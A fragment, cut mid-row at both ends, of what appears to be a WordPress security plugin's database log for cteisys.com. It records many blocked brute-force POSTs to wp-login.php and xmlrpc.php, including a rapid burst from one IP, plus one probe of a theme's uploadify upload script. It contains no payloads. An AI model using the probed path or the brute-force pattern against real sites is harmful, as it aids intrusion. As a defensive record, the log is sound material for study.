Safari\\/537.36\"}','5YiIwtA713RMvj4kL6q20CcN',0,1665010620.9793,1433,'','POST',403,0,600,0,1,'',0),('194.59.165.88',3258688856,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eC9ndY7D4OgZ5LkQMhi1wVaB',0,1665012882.0115,2412,'','POST',403,0,515,0,1,'',0),('157.245.110.251',2650107643,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','kS84w2OZEhgj0Yvps1APDH7d',0,1665013020.1794,1748,'','POST',403,0,600,0,1,'',0),('178.162.204.214',2997013718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','NCsUThj1bxdrkJAZKcQpYa6S',0,1665014511.2718,19802,'','POST',403,0,515,0,1,'',0),('40.70.241.53',675737909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cjmZBORr2XSVk9ebwsGfIpT1',0,1665014586.3622,18553,'','POST',403,0,515,0,1,'',0),('209.141.36.190',3515688126,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','E2y4cQvOPi7z6ZXbGnTgYwtJ',0,1665014862.4702,557,'','POST',403,0,600,0,1,'',0),('82.102.23.139',1382422411,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5oLteMfUvV3GHPiwIEhlnxy2',0,1665015055.9924,18233,'','POST',403,0,515,0,1,'',0),('103.166.183.192',1738979264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','AUlSZPYMgws41NetcKEH3q2h',0,1665015422.0690,17690,'','POST',403,0,600,0,1,'',0),('147.182.249.22',2478242070,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','lDrxEt80aBOXhjKpTHeFdIR7',0,1665015465.4763,1466,'','POST',403,0,600,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','nmRMj28Bov9GVuNbd3tsr6EL',0,1665016018.8993,2051,'','POST',403,0,600,0,1,'',0),('107.180.107.103',1806986087,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cM6AKCmZFo8ah3yqEJikpWRS',0,1665016318.2350,19139,'','POST',403,0,515,0,1,'',0),('195.206.105.227',3285084643,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','k2x9hJKusICQlRzSFetnYmo1',0,1665016833.1833,19018,'','POST',403,0,515,0,1,'',0),('68.183.234.105',1152903785,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','1OHTFhD9ZoA2gWEBLeb7VQkY',0,1665016974.2839,972,'','POST',403,0,515,0,1,'',0),('173.212.197.26',2916402458,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7s3ip8JqGdUc1f0EX6tSKI4W',0,1665017227.1336,18567,'','POST',403,0,515,0,1,'',0),('51.91.220.143',861658255,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','QZG843en9cJtj2C1dsFlgO0p',0,1665017822.2293,18454,'','POST',403,0,600,0,1,'',0),('159.65.200.228',2671888612,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','aVb6kG9QTY1ewZWIyHnSRpcJ',0,1665017866.2475,1245,'','POST',403,0,600,0,1,'',0),('130.61.143.194',2185072578,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uBJgn1UI0VheL48yikrMxTHf',0,1665018142.3802,18747,'','POST',403,0,515,0,1,'',0),('51.159.15.23',866062103,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IyLECfVmT3aPhdNjz4KAxDc6',0,1665019063.4590,1604,'','POST',403,0,515,0,1,'',0),('198.98.60.32',3328326688,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/534.59.10 (KHTML, like Gecko) Version\\/5.1.9 Safari\\/534.59.10\"}','XKEc0JTjOCdSpPkoywb3N2FL',0,1665019115.0702,1407,'','POST',403,0,600,0,1,'',0),('213.152.161.40',3583549736,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zuDAyb4tCHSmJEVlIQp8k9U0',0,1665019980.9836,18678,'','POST',403,0,515,0,1,'',0),('54.37.156.240',908434672,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','OFN9L7D2Zew5QU3jTtsC8MY1',0,1665020242.5782,1507,'','POST',403,0,600,0,1,'',0),('143.244.177.220',2415178204,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','Lgcx7zHhqeX9tN2swVBYp1SF',0,1665020285.6036,1261,'','POST',403,0,600,0,1,'',0),('209.141.46.253',3515690749,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','kIe57SKGgRjUFZlV4icA06dY',0,1665020913.4206,1174,'','POST',403,0,600,0,1,'',0),('217.138.195.27',3649749787,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dhNDTOgerxK671UVYI4wBLtb',0,1665020987.2018,2364,'','POST',403,0,515,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','eocbQhijn1Cqg3FOExRmkLsU',0,1665021706.4052,1361,'','POST',403,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','C5F3dWBtXpwcEora6HONDkGm',0,1665021708.2854,463,'','POST',403,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','dq92tnQwb8GBVjLDsPUF6zMW',0,1665021709.2680,468,'','POST',403,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','LFEKbyaCvkm1ZlfO0NRYzUWP',0,1665021710.2174,477,'','POST',403,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','5YSn8Md3HGB4Rh0DraCvTE1z',0,1665021711.1755,479,'','POST',403,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','sGDK8uWoAQ1v0X3gx4LEakNC',0,1665021712.1589,549,'','POST',404,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','DBQGkV53i78bLqEIlvA2nFhg',0,1665021713.2717,487,'','POST',404,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','My7XvPDNRFG6JmiUTQW8S1Kw',0,1665021714.3397,468,'','POST',404,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','A81ucqC9tSG2PVJyRFgUjTDY',0,1665021715.3902,471,'','POST',404,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','LIYQ5nVvBPFrDmjoM6yx9lUE',0,1665021716.4077,421,'','POST',404,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','5yOU39d1ZGhkDLBenmHgXVjs',0,1665021717.3880,410,'','POST',404,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','9JX6OLu2GtxFk0erhnCZaYUE',0,1665021718.3570,450,'','POST',404,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','UOY8ixNzb60flsEAvh5LoqDe',0,1665021719.4085,492,'','POST',404,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','2CTrD7auAP6ZoMF8Epw4kczd',0,1665021720.5188,607,'','POST',404,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','UQzSm7XPiGqxa4lnD0OLTJFv',0,1665021721.7292,550,'','POST',404,0,600,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','xguelUvBtQRbAkfCoYEK50pi',0,1665021722.8213,330,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','APlyjXY46USfNunDeH8Io0zO',0,1665021723.6219,294,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','Kk6yVxbDMfW3qe4SoGnjwlFv',0,1665021724.4065,317,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','7M8BKR2gCTpwPzmEuLZ1JFO3',0,1665021725.2138,342,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','cTlRuQkyxN3V4Sgo2PjHC7X0',0,1665021726.0466,343,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','RUiunHNFDbrZxK0TOvCGIMEP',0,1665021726.8874,291,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','H0qGvRfaQiX6rVYEI7SNhnkw',0,1665021727.7343,282,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','eJbd87DS61pUoqrX2YaBEk4t',0,1665021728.5152,284,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','fTquzZ50gcD4m9p6jY1oACNL',0,1665021729.2846,312,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','a7tTvGKhd6psgMxQLB4VINe0',0,1665021730.0602,316,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','Gc4dQsZKwC6JT9jnpz3h2D7I',0,1665021730.8682,295,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','Cae6fHbvkrQt1ImdEsjNVwxB',0,1665021731.6704,306,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','KCmuZe2zXsnjlcxW0b7QopDV',0,1665021732.4956,289,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','obyp3tmiS2wEeXFZHhgT04PV',0,1665021733.2294,276,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','lT3wAKbxYZozW5e0XSqGacn2',0,1665021733.9468,284,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','K9qVY4aef02bzMchkiQC8AB3',0,1665021734.6824,277,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','RioxS9IbpWXOVltd2sQKkhDB',0,1665021735.5833,353,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','mUHjst86iEerXLgCI923J0R4',0,1665021736.4263,285,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','1q8ZUQTGsYmgSXH0LuFA2j6b',0,1665021737.1938,301,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','qIdOmCzPZ8b0ik2gTfuv713s',0,1665021737.9696,303,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','iJaq8KzECp20udoxlYNAZM1W',0,1665021738.7289,283,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','hcW1xKyBJCLgmvEApUOSdi8j',0,1665021739.5128,306,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','bTZGFcKQfyLzp3EmBAU2jsdC',0,1665021740.2960,294,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','04UOkm5VtXEMdR2jqaPNpybv',0,1665021741.0713,340,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','GvUYQHe0NyLPuC9ZO2f6XqDT',0,1665021741.9133,351,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','VqrY8yIET7b9wLs5F0hlzm1O',0,1665021742.7487,295,'','POST',403,0,700,0,1,'',0),('159.203.108.168',2680908968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','9nzlcBkFLiUfNtPCHySeJDxI',0,1665021743.5361,284,'','POST',403,0,700,0,1,'',0),('198.98.49.240',3328324080,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','sYZzUEg13JQ8o4BIb9xnWKTm',0,1665021860.0234,1196,'','POST',403,0,600,0,1,'',0),('54.38.44.6',908471302,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','y2KamYnLji4AGRglQqBI0fH3',0,1665021889.5372,2462,'','POST',403,0,515,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.78.2 (KHTML, like Gecko) Version\\/7.0.6 Safari\\/537.78.2\"}','hLKBxQ3osOyimpDC8jGgw5ME',0,1665022326.1513,1339,'','POST',403,0,600,0,1,'',0),('81.88.52.221',1364735197,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','pGaLrvt2DJNQAmi1HzxO7UM4',0,1665022705.4193,17408,'','POST',403,0,600,0,1,'',0),('128.199.14.4',2160528900,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','1Mznwcgek46GfsNYLV7rt92O',0,1665022750.8519,1887,'','POST',403,0,600,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','n21DlHfNhSV8FE6yCYOsAPIj',0,1665022836.0798,2851,'','POST',403,0,515,0,1,'',0),('150.230.247.143',2531719055,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UeDtJi8oup6lBILhyO1F4WTm',0,1665023810.2534,19508,'','POST',403,0,515,0,1,'',0),('106.15.38.206',1779377870,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','u69LJZhD8s2HTFpf4nG3aVWy',0,1665025198.9936,17952,'','POST',403,0,600,0,1,'',0),('171.244.0.91',2884894811,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','Fcd8WQ2Uk3CnZXI9zNS1epwr',0,1665025245.6290,1365,'','POST',403,0,600,0,1,'',0),('144.208.67.117',2429567861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','S1Npw2MV35Ag6PoGcRLDiZQu',0,1665025716.9649,18637,'','POST',403,0,515,0,1,'',0),('178.128.219.45',2994789165,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rox02mtgBJH83WwZVzOvu6bG',0,1665026525.9150,18855,'','POST',403,0,515,0,1,'',0),('134.19.179.139',2249438091,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','w8gY5Hz1WD2J6vTqBZOXUikc',0,1665027154.9743,18934,'','POST',403,0,515,0,1,'',0),('148.72.209.0',2487800064,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GeXElS8oa2W7ZP90UKm3BvYQ',0,1665027627.8386,19515,'','POST',403,0,515,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php','','{\"1\":\"ALittle Client\"}','mjAqyX1sMu4nU7kD39vrHbWP',0,1665027744.3561,1645,'','GET',403,0,700,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 